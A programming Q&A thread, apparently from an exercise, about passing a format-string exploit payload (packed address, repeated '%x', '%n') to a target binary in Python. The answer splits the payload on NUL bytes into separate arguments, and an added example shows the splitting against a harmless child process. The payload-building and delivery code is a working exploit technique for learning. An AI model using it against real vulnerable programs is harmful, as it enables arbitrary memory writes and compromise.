
"must be a string without null bytes" or "can't concat str to bytes" passing a payload on a command line

I am trying to create an exploit for an exercise but I have a problem with the following code:

#!/usr/bin/python
import os
import struct
address = struct.pack("I",0x201014)
payload = address+"." + ".%x."*131 + ".%n."
os.system("/home/osboxes/Desktop/formatString " + payload)

But the error is as follows: TypeError: system() argument 1 must be string without null bytes, not str

I am trying to upgrade to the current version of Python with the "subprocess" utility:

#!/usr/bin/python3
import subprocess
import struct
address = struct.pack("I",0x201014)
payload = address+"." + ".%x."*131 + ".%n."
subprocess.call("/home/osboxes/Desktop/formatString " + payload, shell=True)

But the error is as follows: TypeError: can't concat str to bytes

How could I fix the bytes or str conversion problem for both versions? Both programs agree that the error is in the line "payload = ...".

That string isn't capable of being passed as a command-line argument on UNIX.

Why? Because it contains NUL literals, and UNIX command lines are made up of C strings -- which are NUL-terminated.

>>> address = struct.pack("I",0x201014)
>>> address
b'\x14\x10 \x00'

See that \x00? Not allowed, not possible -- not as one command-line argument, at least.

But you can put it in an argv, as long as it's split into multiple arguments. Note that shell=False below:

import struct, subprocess
address = struct.pack("I", 0x201014)  # same address bytes as in the question
payload = (address + (b'.%x.' * 131) + b'.%n.').split(b'\0')  # each NUL becomes an argument boundary
subprocess.call(['/home/osboxes/Desktop/formatString'] + payload)

How does this work? Because the \x00s that terminate each individual C string are implicitly present at the boundary points.
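The following is an added example, not code from the question or the answer above. It makes the answer's point checkable: a bytes payload containing NUL cannot be handed to execve() as a single argument (Python rejects it with ValueError before the kernel ever sees it), but splitting on NUL yields an argv whose per-element terminators recreate the original byte sequence in the child's memory. To keep it runnable offline it spawns a Python child instead of the formatString binary, and shortens the "%x" repeat count to 3; both are assumptions of this example. It also covers the edge case the answer does not mention: a trailing NUL produces an empty final argument, which is legal for execve() but is sometimes lost by wrappers that drop empty strings.

```python
import struct
import subprocess
import sys

# Constructed sample, mirroring the question: a little-endian 4-byte address.
ADDRESS = struct.pack("I", 0x201014)  # b'\x14\x10 \x00' -- note the embedded NUL
# Repeat count shortened from 131 to 3 so the demo output stays readable (assumption).
PAYLOAD = ADDRESS + b"." + b".%x." * 3 + b".%n."


def has_embedded_nul(payload: bytes) -> bool:
    """True if the payload cannot be a single C string (and hence a single argv entry)."""
    return b"\0" in payload


def single_argument_rejected(payload: bytes) -> bool:
    """Show that Python refuses to pass NUL-containing bytes as ONE argument.

    subprocess converts each argument with the filesystem encoder, which raises
    ValueError('embedded null byte') before execve() is attempted.
    """
    try:
        subprocess.run([sys.executable, "-c", "pass", payload], check=True)
    except ValueError:
        return True
    return False


def payload_to_argv(payload: bytes) -> list[bytes]:
    """Split a NUL-containing payload into separate argv elements.

    Each element is passed to the child as its own NUL-terminated C string, so the
    NULs stripped here reappear in the child's memory as the terminators.  A trailing
    NUL yields an empty last element; an argv element of b'' is valid for execve().
    """
    return payload.split(b"\0")


def child_memory_image(argv: list[bytes]) -> bytes:
    """Model how the argument strings are laid out by the kernel: each followed by NUL.

    For any payload p, child_memory_image(payload_to_argv(p)) == p + b'\\0', i.e. the
    original bytes are contiguous again, plus the terminator of the last argument.
    """
    return b"".join(a + b"\0" for a in argv)


def argv_lengths_seen_by_child(argv: list[bytes]) -> list[int]:
    """Spawn a Python child and report the byte length of every argument it received.

    os.fsencode() in the child recovers the raw bytes that execve() delivered,
    so the lengths prove each element arrived intact and separately.
    """
    child = ("import os, sys; "
             "print(','.join(str(len(os.fsencode(a))) for a in sys.argv[1:]))")
    result = subprocess.run([sys.executable, "-c", child] + argv,
                            capture_output=True, check=True)
    return [int(x) for x in result.stdout.decode().strip().split(",")]


if __name__ == "__main__":
    print("payload has NUL:", has_embedded_nul(PAYLOAD))
    print("rejected as one argument:", single_argument_rejected(PAYLOAD))
    argv = payload_to_argv(PAYLOAD)
    print("argv elements:", argv)
    print("child argument lengths:", argv_lengths_seen_by_child(argv))
    print("memory image == payload + NUL:", child_memory_image(argv) == PAYLOAD + b"\0")
    print("trailing NUL gives empty last arg:", payload_to_argv(b"AB\0"))
```

The split approach only works because the target reads its format string from argv, where the NUL terminators are supplied by the kernel; if the program read the payload from stdin or a file, the NUL would have to be written literally instead.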
